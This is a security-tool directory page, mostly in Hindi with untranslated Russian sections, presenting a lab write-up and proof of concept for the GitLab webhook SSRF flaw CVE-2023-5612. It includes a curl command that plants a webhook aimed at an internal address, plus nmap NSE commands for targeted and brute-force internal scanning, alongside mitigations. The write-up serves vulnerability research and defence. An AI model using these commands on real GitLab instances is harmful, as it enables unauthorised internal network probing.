Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Review.CVE-2023-5612 — CVE-2023-5612 का स्क्रिप्ट के माध्यम से विश्लेषण | Kitploit
उपकरण/GitHubGitHub/topskiypavelqwertygang/review.cve-2023-5612
टोहीनेटवर्क मैपिंगभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubtopskiypavelqwertygang/review.cve-2023-5612

Review.CVE-2023-5612

CVE-2023-5612 का स्क्रिप्ट के माध्यम से विश्लेषण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
461 साल पहलेअभी तक समीक्षित नहीं

CVE-2023-5612 – वेबहुक URL के माध्यम से GitLab SSRF (PoC और विश्लेषण)

📌 CVE अवलोकन

  • CVE-ID: CVE-2023-5612
  • गंभीरता: उच्च (CVSS: 8.1 बेस स्कोर)
  • प्रकार: सर्वर-साइड अनुरोध जालसाजी (SSRF)
  • घटक: GitLab CE/EE वेबहुक
  • प्रभावित संस्करण: GitLab CE/EE < 16.2.7, 16.3 < 16.3.4, 16.4 < 16.4.1

🧠 विवरण

GitLab CE/EE में एक SSRF कमजोरी हमलावरों को मान्य प्रोजेक्ट मेंटेनर एक्सेस के साथ दुर्भावनापूर्ण वेबहुक URL के माध्यम से मनमानी आंतरिक सेवाओं को शिल्पित अनुरोध भेजने की अनुमति देती है। शोषण से आंतरिक नेटवर्क स्कैनिंग, मेटाडेटा लीकेज, या आगे पिवोटिंग होती है।


✅ शोषण की शर्तें

  • हमलावर के पास प्रोजेक्ट के लिए मेंटेनर एक्सेस है
  • GitLab के पास वेबहुक URL की सख्त फ़िल्टरिंग या वैलिडेशन नहीं है

⚙️ PoC चरण (मैनुअल)

root@kitploit:~
curl -s --header "PRIVATE-TOKEN: <TOKEN>" \
     --data-urlencode "url=http://127.0.0.1:8888" \
     http://<gitlab-host>:8080/api/v4/projects/<project_id>/hooks

🧱 वातावरण और सेटअप

root@kitploit:~
- Kali Linux внутри виртуальной машины, развернутой специально под тестирование
- Поднятый через Docker экземпляр уязвимого GitLab CE (порт 8080)
- Внутри GitLab:
- Создан тестовый проект
- Сгенерирован Personal Access Token (glpat-...) с правами Maintainer
- Для внутреннего SSRF-таргета был поднят минимальный HTTP-сервис на 127.0.0.1:8888

🧠 पद्धति

root@kitploit:~
- Подтверждение уязвимости вручную через curl (см. PoC)
- Создание кастомных NSE-скриптов:
gitlab-ssrf.nse: точечная проверка SSRF
gitlab-ssrf-brute.nse: автоматический перебор внутренних адресов
- Тестирование с nmap -d и --script-trace, для анализа поведения API и фиксации результатов
- Получение отклика 401 Unauthorized от внутреннего сервиса, что указывает на успешный SSRF
- Успешный запрос вернет `201 Created` либо ошибку вида `401 Unauthorized`, что указывает на SSRF-доступ.

🛠 NSE स्क्रिप्ट (मैनुअल ट्रिगर)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

🧪 NSE स्क्रिप्ट (आंतरिक URL की ब्रूटफोर्स)

root@kitploit:~
nmap -p 8080 \
  --script ./gitlab-ssrf-brute.nse \
  --script-args gitlab.token="<TOKEN>" \
  <target-ip>

📈 निष्कर्ष

root@kitploit:~
В ходе работы над уязвимостью **CVE-2023-5612** был воспроизведён успешный SSRF-атакующий сценарий с доступом к внутренним адресам через API GitLab CE. Это демонстрирует, насколько важно ограничивать возможности вебхуков и внедрять валидацию URL-адресов на стороне сервера.

🎯 लक्ष्य पूरा हुआ:

  • SSRF की पुष्टि हुई
  • NSE टूलकिट लागू किया गया
  • परियोजना का दस्तावेज़ीकरण किया गया और समुदाय के लिए खोला गया

📂 रेपो संरचना

root@kitploit:~
.
├── gitlab-ssrf.nse             # NSE script for manual SSRF verification
├── gitlab-ssrf-brute.nse       # NSE brute script to scan internal hosts/ports
├── screenshots/                # Скрины выполнения PoC и подтверждения уязвимости
└── README.md                   # Этот файл

🖼 स्क्रीनशॉट

  • ✅ सफल SSRF जिसने 401 अनधिकृत लौटाया
  • 📜 nmap लॉग जिसमें स्क्रिप्ट का निष्पादन
  • 📦 API के माध्यम से वेबहुक जोड़ना

⚠️ शमन

  • GitLab को >= 16.2.7 / 16.3.4 / 16.4.1 में अपग्रेड करें
  • आउटबाउंड HTTP को ईग्रेस फ़ायरवॉल के माध्यम से सीमित करें
  • वेबहुक के लिए आंतरिक अनुमति-सूचियों का उपयोग करें

🧠 लेखक और संपर्क

Pavel Topskiy
GitHub • सुरक्षा विश्लेषक, रेड टीम विश्लेषक


📅 समयरेखा

  • जून 2025: PoC और कमजोरी का विश्लेषण
  • 5 जून 2025: कस्टम NSE स्क्रिप्ट और परीक्षणों का लेखन

🔐 अस्वीकरण

सभी परीक्षण जानबूझकर कमजोर संस्करणों पर पृथक प्रयोगशाला वातावरण में किए गए। इसका उपयोग अनधिकृत प्रणालियों के विरुद्ध न करें। नैतिक हैकिंग सिद्धांतों का सम्मान करें।

टूल डाउनलोड करें